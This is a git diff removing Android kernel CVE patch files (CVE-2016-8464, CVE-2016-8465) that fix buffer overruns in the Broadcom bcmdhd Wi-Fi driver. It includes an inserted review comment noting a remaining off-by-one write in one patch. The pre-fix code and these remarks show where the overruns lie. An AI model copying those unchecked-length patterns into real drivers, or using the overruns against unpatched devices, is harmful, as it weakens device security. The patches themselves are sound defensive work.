-for output string overwritten.
-
-2. added additional length check not to override user space
-allocated buffer size.
-
-bug=29000183
-Change-Id: I0c15d764c1648920f0214ec47ada689ca44ebfba
-Signed-off-by: Insun Song
----
- drivers/net/wireless/bcmdhd/wl_android.c | 58 ++++++++++++++++++++------------
- 1 file changed, 37 insertions(+), 21 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c
-index c8cae82af2f46..86c56e28f532c 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.c
-+++ b/drivers/net/wireless/bcmdhd/wl_android.c
-@@ -246,17 +246,22 @@ static int wl_android_get_rssi(struct net_device *net, char *command, int total_
- return -1;
- if ((ssid.SSID_len == 0) || (ssid.SSID_len > DOT11_MAX_SSID_LEN)) {
- DHD_ERROR(("%s: wldev_get_ssid failed\n", __FUNCTION__));
-- } else if (total_len <= ssid.SSID_len) {
-- return -ENOMEM;
- } else {
-- memcpy(command, ssid.SSID, ssid.SSID_len);
-- bytes_written = ssid.SSID_len;
-+ if (total_len > ssid.SSID_len) {
-+ memcpy(command, ssid.SSID, ssid.SSID_len);
-+ bytes_written = ssid.SSID_len;
-+ } else {
-+ return BCME_ERROR;
-+ }
-+ }
-+
-+ if ((total_len - bytes_written) >= (strlen(" rssi -XXX") + 1)) {
-+ bytes_written += snprintf(&command[bytes_written], total_len - bytes_written,
-+ " rssi %d", rssi);
-+ command[bytes_written] = '\0';
-+ } else {
-+ return BCME_ERROR;
- }
-- if ((total_len - bytes_written) < (strlen(" rssi -XXX") + 1))
-- return -ENOMEM;
-- bytes_written += scnprintf(&command[bytes_written],
-- total_len - bytes_written, " rssi %d", rssi);
-- command[bytes_written] = '\0';
-
- DHD_INFO(("%s: command result is %s (%d)\n", __FUNCTION__, command, bytes_written));
- return bytes_written;
-@@ -1332,13 +1337,17 @@ int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
- }
-
- if ((priv_cmd.total_len > PRIVATE_COMMAND_MAX_LEN) || (priv_cmd.total_len < 0)) {
-- DHD_ERROR(("%s: buf length invalid:%d\n", __FUNCTION__,
-- priv_cmd.total_len));
-+ DHD_ERROR(("%s: buf length invalid:%d \n", __FUNCTION__, priv_cmd.total_len));
- ret = -EINVAL;
- goto exit;
- }
-
-- buf_size = max(priv_cmd.total_len, PRIVATE_COMMAND_DEF_LEN);
-+ if (priv_cmd.total_len < PRIVATE_COMMAND_DEF_LEN) {
-+ buf_size = PRIVATE_COMMAND_DEF_LEN;
-+ } else {
-+ buf_size = priv_cmd.total_len;
-+ }
-+
- command = kmalloc((buf_size + 1), GFP_KERNEL);
-
- if (!command)
-@@ -1355,20 +1364,22 @@ int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
-
- DHD_INFO(("%s: Android private cmd \"%s\" on %s\n", __FUNCTION__, command, ifr->ifr_name));
-
-- bytes_written = wl_handle_private_cmd(net, command, priv_cmd.total_len);
-+ bytes_written = wl_handle_private_cmd(net, command, buf_size);
- if (bytes_written >= 0) {
-- if ((bytes_written == 0) && (priv_cmd.total_len > 0))
-+ if ((bytes_written == 0) && (priv_cmd.total_len > 0)) {
- command[0] = '\0';
-+ }
- if (bytes_written >= priv_cmd.total_len) {
-- DHD_ERROR(("%s: err. b_w:%d >= tot:%d\n", __FUNCTION__,
-- bytes_written, priv_cmd.total_len));
-+ DHD_ERROR(("%s: not enough for output. bytes_written:%d >= total_len:%d \n",
-+ __FUNCTION__, bytes_written, priv_cmd.total_len));
- ret = BCME_BUFTOOSHORT;
- goto exit;
-+ } else {
-+ bytes_written++;
- }
-- bytes_written++;
- priv_cmd.used_len = bytes_written;
- if (copy_to_user(priv_cmd.buf, command, bytes_written)) {
-- DHD_ERROR(("%s: failed copy to user\n", __FUNCTION__));
-+ DHD_ERROR(("%s: failed to copy data to user buffer\n", __FUNCTION__));
- ret = -EFAULT;
- }
- } else {
-@@ -1377,13 +1388,17 @@ int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
-
- exit:
- net_os_wake_unlock(net);
-- kfree(command);
-+ if (command) {
-+ kfree(command);
-+ }
-+
- return ret;
- }
-
- int
- wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
- {
-+
- int bytes_written = 0;
- android_wifi_priv_cmd priv_cmd;
-
-@@ -1400,7 +1415,7 @@ wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
-
- if (!g_wifi_on) {
- DHD_ERROR(("%s: Ignore private cmd \"%s\" - iface is down\n",
-- __FUNCTION__, command));
-+ __FUNCTION__, command));
- return 0;
- }
-
-@@ -1558,7 +1573,8 @@ wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
- }
- else {
- DHD_ERROR(("Unknown PRIVATE command %s - ignored\n", command));
-- bytes_written = scnprintf(command, sizeof("FAIL"), "FAIL");
-+ snprintf(command, 5, "FAIL");
-+ bytes_written = strlen("FAIL");
- }
-
- return bytes_written;
diff --git a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch
deleted file mode 100644
index 7cafb519..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch
+++ /dev/null
@@ -1,165 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c
-index 24b71c5..0db69ef 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.c
-+++ b/drivers/net/wireless/bcmdhd/wl_android.c
-@@ -246,11 +246,18 @@
- return -1;
- if ((ssid.SSID_len == 0) || (ssid.SSID_len > DOT11_MAX_SSID_LEN)) {
- DHD_ERROR(("%s: wldev_get_ssid failed\n", __FUNCTION__));
-+ } else if (total_len <= ssid.SSID_len) {
-+ return -ENOMEM;
- } else {
- memcpy(command, ssid.SSID, ssid.SSID_len);
- bytes_written = ssid.SSID_len;
- }
-- bytes_written += snprintf(&command[bytes_written], total_len, " rssi %d", rssi);
-+ if ((total_len - bytes_written) < (strlen(" rssi -XXX") + 1))
-+ return -ENOMEM;
-+ bytes_written += scnprintf(&command[bytes_written],
-+ total_len - bytes_written, " rssi %d", rssi);
-+ command[bytes_written] = '\0';
-+
- DHD_INFO(("%s: command result is %s (%d)\n", __FUNCTION__, command, bytes_written));
- return bytes_written;
- }
-@@ -1284,10 +1291,13 @@
- int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
- {
- #define PRIVATE_COMMAND_MAX_LEN 8192
-+#define PRIVATE_COMMAND_DEF_LEN 4096
-+
- int ret = 0;
- char *command = NULL;
- int bytes_written = 0;
- android_wifi_priv_cmd priv_cmd;
-+ int buf_size = 0;
-
- net_os_wake_lock(net);
-
-@@ -1321,12 +1331,17 @@
- goto exit;
- }
- }
-+
- if ((priv_cmd.total_len > PRIVATE_COMMAND_MAX_LEN) || (priv_cmd.total_len < 0)) {
-- DHD_ERROR(("%s: too long priavte command\n", __FUNCTION__));
-+ DHD_ERROR(("%s: buf length invalid:%d\n", __FUNCTION__,
-+ priv_cmd.total_len));
- ret = -EINVAL;
- goto exit;
- }
-- command = kmalloc((priv_cmd.total_len + 1), GFP_KERNEL);
-+
-+ buf_size = max(priv_cmd.total_len, PRIVATE_COMMAND_DEF_LEN);
-+ command = kmalloc((buf_size + 1), GFP_KERNEL);
-+
- if (!command)
- {
- DHD_ERROR(("%s: failed to allocate memory\n", __FUNCTION__));
-@@ -1341,6 +1356,41 @@
-
- DHD_INFO(("%s: Android private cmd \"%s\" on %s\n", __FUNCTION__, command, ifr->ifr_name));
-
-+ bytes_written = wl_handle_private_cmd(net, command, priv_cmd.total_len);
-+ if (bytes_written >= 0) {
-+ if ((bytes_written == 0) && (priv_cmd.total_len > 0))
-+ command[0] = '\0';
-+ if (bytes_written >= priv_cmd.total_len) {
-+ DHD_ERROR(("%s: err. b_w:%d >= tot:%d\n", __FUNCTION__,
-+ bytes_written, priv_cmd.total_len));
-+ ret = BCME_BUFTOOSHORT;
-+ goto exit;
-+ }
-+ bytes_written++;
-+ priv_cmd.used_len = bytes_written;
-+ if (copy_to_user(priv_cmd.buf, command, bytes_written)) {
-+ DHD_ERROR(("%s: failed copy to user\n", __FUNCTION__));
-+ ret = -EFAULT;
-+ }
-+ } else {
-+ ret = bytes_written;
-+ }
-+
-+exit:
-+ net_os_wake_unlock(net);
-+ kfree(command);
-+ return ret;
-+}
-+
-+int
-+wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
-+{
-+ int bytes_written = 0;
-+ android_wifi_priv_cmd priv_cmd;
-+
-+ bzero(&priv_cmd, sizeof(android_wifi_priv_cmd));
-+ priv_cmd.total_len = buf_size;
-+
- if (strnicmp(command, CMD_START, strlen(CMD_START)) == 0) {
- DHD_INFO(("%s, Received regular START command\n", __FUNCTION__));
- bytes_written = wl_android_wifi_on(net);
-@@ -1350,10 +1400,9 @@
- }
-
- if (!g_wifi_on) {
-- DHD_ERROR(("%s: Ignore private cmd \"%s\" - iface %s is down\n",
-- __FUNCTION__, command, ifr->ifr_name));
-- ret = 0;
-- goto exit;
-+ DHD_ERROR(("%s: Ignore private cmd \"%s\" - iface is down\n",
-+ __FUNCTION__, command));
-+ return 0;
- }
-
- if (strnicmp(command, CMD_STOP, strlen(CMD_STOP)) == 0) {
-@@ -1511,36 +1560,10 @@
- }
- else {
- DHD_ERROR(("Unknown PRIVATE command %s - ignored\n", command));
-- snprintf(command, 3, "OK");
-- bytes_written = strlen("OK");
-+ bytes_written = scnprintf(command, sizeof("FAIL"), "FAIL");
- }
-
-- if (bytes_written >= 0) {
-- if ((bytes_written == 0) && (priv_cmd.total_len > 0))
-- command[0] = '\0';
-- if (bytes_written >= priv_cmd.total_len) {
-- DHD_ERROR(("%s: bytes_written = %d\n", __FUNCTION__, bytes_written));
-- bytes_written = priv_cmd.total_len;
-- } else {
-- bytes_written++;
-- }
-- priv_cmd.used_len = bytes_written;
-- if (copy_to_user(priv_cmd.buf, command, bytes_written)) {
-- DHD_ERROR(("%s: failed to copy data to user buffer\n", __FUNCTION__));
-- ret = -EFAULT;
-- }
-- }
-- else {
-- ret = bytes_written;
-- }
--
--exit:
-- net_os_wake_unlock(net);
-- if (command) {
-- kfree(command);
-- }
--
-- return ret;
-+ return bytes_written;
- }
-
- int wl_android_init(void)
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.h b/drivers/net/wireless/bcmdhd/wl_android.h
-index 2827132..f62b646 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.h
-+++ b/drivers/net/wireless/bcmdhd/wl_android.h
-@@ -53,6 +53,7 @@
- int wl_android_wifi_on(struct net_device *dev);
- int wl_android_wifi_off(struct net_device *dev, bool on_failure);
- int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd);
-+int wl_handle_private_cmd(struct net_device *net, char *command, u32 cmd_len);
-
-
- /* hostap mac mode */
diff --git a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch.base64
deleted file mode 100644
index 8a38957a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.10/0001.patch
deleted file mode 100644
index f39a5bf9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0001.patch
+++ /dev/null
@@ -1,155 +0,0 @@
-From 8f1621cd0d0ca0bc494a926a1331f582b27b913e Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Thu, 3 Nov 2016 10:53:51 -0700
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in
- wl_cfgvendor_hotlist_cfg
-
-fix buffer overrun found where user manipulated input parameters
-
-1. allocate local buffer with max length than input sized.
-2. length check added in each tlv parsing and added error handling.
-3. limit max hotlist count to PFN_SW_MAX_NUM_APS(16).
-
-bug=32474971
-
-Signed-off-by: Insun Song
-Change-Id: I60d513a30875f6a8ee8cfdc557bdec1436416fe7
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 107 +++++++++++++++++++++--------
- 1 file changed, 78 insertions(+), 29 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index eb83c8339e471..d578026885619 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -691,14 +691,22 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
- gscan_hotlist_scan_params_t *hotlist_params;
- int tmp, tmp1, tmp2, type, j = 0, dummy;
-- const struct nlattr *outer, *inner, *iter;
-- bool flush = FALSE;
-+ const struct nlattr *outer, *inner = NULL, *iter;
-+ uint8 flush = 0;
- struct bssid_t *pbssid;
-
-- hotlist_params = (gscan_hotlist_scan_params_t *)kzalloc(len, GFP_KERNEL);
-+ if (len < sizeof(*hotlist_params) || len >= WLC_IOCTL_MAXLEN) {
-+ WL_ERR(("buffer length :%d wrong - bail out.\n", len));
-+ return -EINVAL;
-+ }
-+
-+ hotlist_params = kzalloc(sizeof(*hotlist_params)
-+ + (sizeof(struct bssid_t) * (PFN_SWC_MAX_NUM_APS - 1)),
-+ GFP_KERNEL);
-+
- if (!hotlist_params) {
- WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
-- return -1;
-+ return -ENOMEM;
- }
-
- hotlist_params->lost_ap_window = GSCAN_LOST_AP_WINDOW_DEFAULT;
-@@ -706,37 +714,78 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- nla_for_each_attr(iter, data, len, tmp2) {
- type = nla_type(iter);
- switch (type) {
-- case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-- pbssid = hotlist_params->bssid;
-- nla_for_each_nested(outer, iter, tmp) {
-- nla_for_each_nested(inner, outer, tmp1) {
-- type = nla_type(inner);
-+ case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+ pbssid = hotlist_params->bssid;
-+ nla_for_each_nested(outer, iter, tmp) {
-+ nla_for_each_nested(inner, outer, tmp1) {
-+ type = nla_type(inner);
-
-- switch (type) {
-- case GSCAN_ATTRIBUTE_BSSID:
-- memcpy(&(pbssid[j].macaddr),
-- nla_data(inner), ETHER_ADDR_LEN);
-- break;
-- case GSCAN_ATTRIBUTE_RSSI_LOW:
-- pbssid[j].rssi_reporting_threshold =
-- (int8) nla_get_u8(inner);
-- break;
-- case GSCAN_ATTRIBUTE_RSSI_HIGH:
-- dummy = (int8) nla_get_u8(inner);
-- break;
-+ switch (type) {
-+ case GSCAN_ATTRIBUTE_BSSID:
-+ if (nla_len(inner) != sizeof(pbssid[j].macaddr)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
- }
-+ memcpy(
-+ &pbssid[j].macaddr,
-+ nla_data(inner),
-+ sizeof(pbssid[j].macaddr));
-+ break;
-+ case GSCAN_ATTRIBUTE_RSSI_LOW:
-+ if (nla_len(inner) != sizeof(uint8)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ pbssid[j].rssi_reporting_threshold =
-+ (int8)nla_get_u8(inner);
-+ break;
-+ case GSCAN_ATTRIBUTE_RSSI_HIGH:
-+ if (nla_len(inner) != sizeof(uint8)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ dummy = (int8)nla_get_u8(inner);
-+ break;
- }
-- j++;
-+ }
-+ if (++j > PFN_SWC_MAX_NUM_APS) {
-+ WL_DBG(("nbssid:%d exeed limit.\n",
-+ hotlist_params->nbssid));
-+ err = -EINVAL;
-+ goto exit;
- }
- hotlist_params->nbssid = j;
-- break;
-- case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-- flush = (bool) nla_get_u8(iter);
-- break;
-- case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
-- hotlist_params->lost_ap_window = nla_get_u32(iter);
-- break;
- }
-+ break;
-+ case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-+ if (nla_len(iter) != sizeof(uint8)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ flush = nla_get_u8(iter);
-+ break;
-+ case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
-+ if (nla_len(iter) != sizeof(uint32)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ hotlist_params->lost_ap_window = (uint16)nla_get_u32(iter);
-+ break;
-+ default:
-+ WL_DBG(("Unknown type %d\n", type));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.10/0002.patch
deleted file mode 100644
index 23145edd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.10/0002.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 50ba575e9cd28ab9537f0961bbc051a6a727da74 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Wed, 30 Nov 2016 12:00:17 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix hotlist index in
- wl_cfgvendor_hotlist_cfg
-
-add bssid count element to exactly refer in NL-TLV parsing.
-
-This change need to sync with
-/hardware/broadcom/wlan/bcmdhd/wifi_hal/gscan.cpp
-where GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT supposed to be called.
-
-Bug: 32474971
-
-Signed-off-by: Insun Song
-Change-Id: Id2b019bb43fb99b3843fe1b32f59e58c7af7cdad
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 39 ++++++++++++++++++++++++------
- drivers/net/wireless/bcmdhd/wl_cfgvendor.h | 1 +
- 2 files changed, 32 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index b156660ed053a..9a73de20f1298 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -705,7 +705,7 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- GFP_KERNEL);
-
- if (!hotlist_params) {
-- WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
-+ WL_ERR(("Cannot Malloc mem.\n"));
- return -ENOMEM;
- }
-
-@@ -714,10 +714,33 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- nla_for_each_attr(iter, data, len, tmp2) {
- type = nla_type(iter);
- switch (type) {
-+ case GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT:
-+ if (nla_len(iter) != sizeof(uint32)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ hotlist_params->nbssid = (uint16)nla_get_u32(iter);
-+ if ((hotlist_params->nbssid == 0) ||
-+ (hotlist_params->nbssid > PFN_SWC_MAX_NUM_APS)) {
-+ WL_ERR(("nbssid:%d exceed limit.\n",
-+ hotlist_params->nbssid));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ break;
- case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+ if (hotlist_params->nbssid == 0) {
-+ WL_ERR(("nbssid not retrieved.\n"));
-+ err = -EINVAL;
-+ goto exit;
-+ }
- pbssid = hotlist_params->bssid;
- nla_for_each_nested(outer, iter, tmp) {
- nla_for_each_nested(inner, outer, tmp1) {
-+ if (j >= hotlist_params->nbssid)
-+ break;
- type = nla_type(inner);
-
- switch (type) {
-@@ -754,13 +777,13 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- break;
- }
- }
-- if (++j > PFN_SWC_MAX_NUM_APS) {
-- WL_DBG(("nbssid:%d exeed limit.\n",
-- hotlist_params->nbssid));
-- err = -EINVAL;
-- goto exit;
-- }
-- hotlist_params->nbssid = j;
-+ j++;
-+ }
-+ if (j != hotlist_params->nbssid) {
-+ WL_ERR(("bssid_cnt:%d != nbssid:%d.\n", j,
-+ hotlist_params->nbssid));
-+ err = -EINVAL;
-+ goto exit;
- }
- break;
- case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-index e6cb53a1de087..e15666f720e50 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-@@ -203,6 +203,7 @@ enum gscan_attributes {
- GSCAN_ATTRIBUTE_RSSI_HIGH,
- GSCAN_ATTRIBUTE_HOSTLIST_BSSID_ELEM,
- GSCAN_ATTRIBUTE_HOTLIST_FLUSH,
-+ GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT,
-
- /* remaining reserved for additional attributes */
- GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE = 60,
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.18/0003.patch
deleted file mode 100644
index 83a9f1f7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0003.patch
+++ /dev/null
@@ -1,156 +0,0 @@
-From 4add5112babf94dbc0f86e93395b6622d5080d16 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Thu, 3 Nov 2016 10:53:51 -0700
-Subject: net: wireless: bcmdhd: fix buffer overrun in wl_cfgvendor_hotlist_cfg
-
-fix buffer overrun found where user manipulated input parameters
-
-1. allocate local buffer with max length than input sized.
-2. length check added in each tlv parsing and added error handling.
-3. limit max hotlist count to PFN_SW_MAX_NUM_APS(16).
-
-bug=32474971
-
-Signed-off-by: Insun Song
-Change-Id: I60d513a30875f6a8ee8cfdc557bdec1436416fe7
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 105 +++++++++++++++++++++--------
- 1 file changed, 77 insertions(+), 28 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index aa8f352..037e885 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -615,14 +615,22 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
- gscan_hotlist_scan_params_t *hotlist_params;
- int tmp, tmp1, tmp2, type, j = 0, dummy;
-- const struct nlattr *outer, *inner, *iter;
-+ const struct nlattr *outer, *inner = NULL, *iter;
- uint8 flush = 0;
- struct bssid_t *pbssid;
-
-- hotlist_params = (gscan_hotlist_scan_params_t *)kzalloc(len, GFP_KERNEL);
-+ if (len < sizeof(*hotlist_params) || len >= WLC_IOCTL_MAXLEN) {
-+ WL_ERR(("buffer length :%d wrong - bail out.\n", len));
-+ return -EINVAL;
-+ }
-+
-+ hotlist_params = kzalloc(sizeof(*hotlist_params)
-+ + (sizeof(struct bssid_t) * (PFN_SWC_MAX_NUM_APS - 1)),
-+ GFP_KERNEL);
-+
- if (!hotlist_params) {
- WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
-- return -1;
-+ return -ENOMEM;
- }
-
- hotlist_params->lost_ap_window = GSCAN_LOST_AP_WINDOW_DEFAULT;
-@@ -630,37 +638,78 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- nla_for_each_attr(iter, data, len, tmp2) {
- type = nla_type(iter);
- switch (type) {
-- case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-- pbssid = hotlist_params->bssid;
-- nla_for_each_nested(outer, iter, tmp) {
-- nla_for_each_nested(inner, outer, tmp1) {
-- type = nla_type(inner);
-+ case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+ pbssid = hotlist_params->bssid;
-+ nla_for_each_nested(outer, iter, tmp) {
-+ nla_for_each_nested(inner, outer, tmp1) {
-+ type = nla_type(inner);
-
-- switch (type) {
-- case GSCAN_ATTRIBUTE_BSSID:
-- memcpy(&(pbssid[j].macaddr),
-- nla_data(inner), ETHER_ADDR_LEN);
-- break;
-- case GSCAN_ATTRIBUTE_RSSI_LOW:
-- pbssid[j].rssi_reporting_threshold =
-- (int8) nla_get_u8(inner);
-- break;
-- case GSCAN_ATTRIBUTE_RSSI_HIGH:
-- dummy = (int8) nla_get_u8(inner);
-- break;
-+ switch (type) {
-+ case GSCAN_ATTRIBUTE_BSSID:
-+ if (nla_len(inner) != sizeof(pbssid[j].macaddr)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ memcpy(
-+ &pbssid[j].macaddr,
-+ nla_data(inner),
-+ sizeof(pbssid[j].macaddr));
-+ break;
-+ case GSCAN_ATTRIBUTE_RSSI_LOW:
-+ if (nla_len(inner) != sizeof(uint8)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ pbssid[j].rssi_reporting_threshold =
-+ (int8)nla_get_u8(inner);
-+ break;
-+ case GSCAN_ATTRIBUTE_RSSI_HIGH:
-+ if (nla_len(inner) != sizeof(uint8)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
- }
-+ dummy = (int8)nla_get_u8(inner);
-+ break;
- }
-- j++;
-+ }
-+ if (++j > PFN_SWC_MAX_NUM_APS) {
-+ WL_DBG(("nbssid:%d exeed limit.\n",
-+ hotlist_params->nbssid));
-+ err = -EINVAL;
-+ goto exit;
- }
- hotlist_params->nbssid = j;
-- break;
-- case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-- flush = nla_get_u8(iter);
-- break;
-- case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
-- hotlist_params->lost_ap_window = nla_get_u32(iter);
-- break;
- }
-+ break;
-+ case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-+ if (nla_len(iter) != sizeof(uint8)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ flush = nla_get_u8(iter);
-+ break;
-+ case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
-+ if (nla_len(iter) != sizeof(uint32)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ hotlist_params->lost_ap_window = (uint16)nla_get_u32(iter);
-+ break;
-+ default:
-+ WL_DBG(("Unknown type %d\n", type));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0004.patch b/Patches/Linux_CVEs/CVE-2016-8465/3.18/0004.patch
deleted file mode 100644
index 6ac0375c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8465/3.18/0004.patch
+++ /dev/null
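Review bot: The bound on `j` in the `GSCAN_ATTRIBUTE_HOTLIST_BSSIDS` case of 0003.patch is tested only after the entry has been written: `if (++j > PFN_SWC_MAX_NUM_APS)` sits after the inner loop that stores into `pbssid[j]`, and with `>` it still lets `j` reach `PFN_SWC_MAX_NUM_APS`. The `kzalloc` earlier in the patch sizes the buffer for what appears to be `PFN_SWC_MAX_NUM_APS` entries, so one further nested element would be stored at `pbssid[PFN_SWC_MAX_NUM_APS]` before the request is rejected. Checking first, with `if (j >= PFN_SWC_MAX_NUM_APS) { err = -EINVAL; goto exit; }` at the top of the `nla_for_each_nested(outer, iter, tmp)` body, closes that gap; the later 0004.patch on this page bounds `j` by `nbssid` before the write instead. The function starts and ends outside the hunk.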
@@ -1,103 +0,0 @@
-From 3619fd91b831f184d2e544e23cb54d20eed2531e Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Wed, 30 Nov 2016 12:00:17 -0800
-Subject: net: wireless: bcmdhd: fix hotlist index in wl_cfgvendor_hotlist_cfg
-
-add bssid count element to exactly refer in NL-TLV parsing.
-
-This change need to sync with
-/hardware/broadcom/wlan/bcmdhd/wifi_hal/gscan.cpp
-where GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT supposed to be called.
-
-Bug: 32474971
-
-Signed-off-by: Insun Song
-Change-Id: Id2b019bb43fb99b3843fe1b32f59e58c7af7cdad
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 39 ++++++++++++++++++++++++------
- drivers/net/wireless/bcmdhd/wl_cfgvendor.h | 1 +
- 2 files changed, 32 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 420cb2f..3e80169 100644
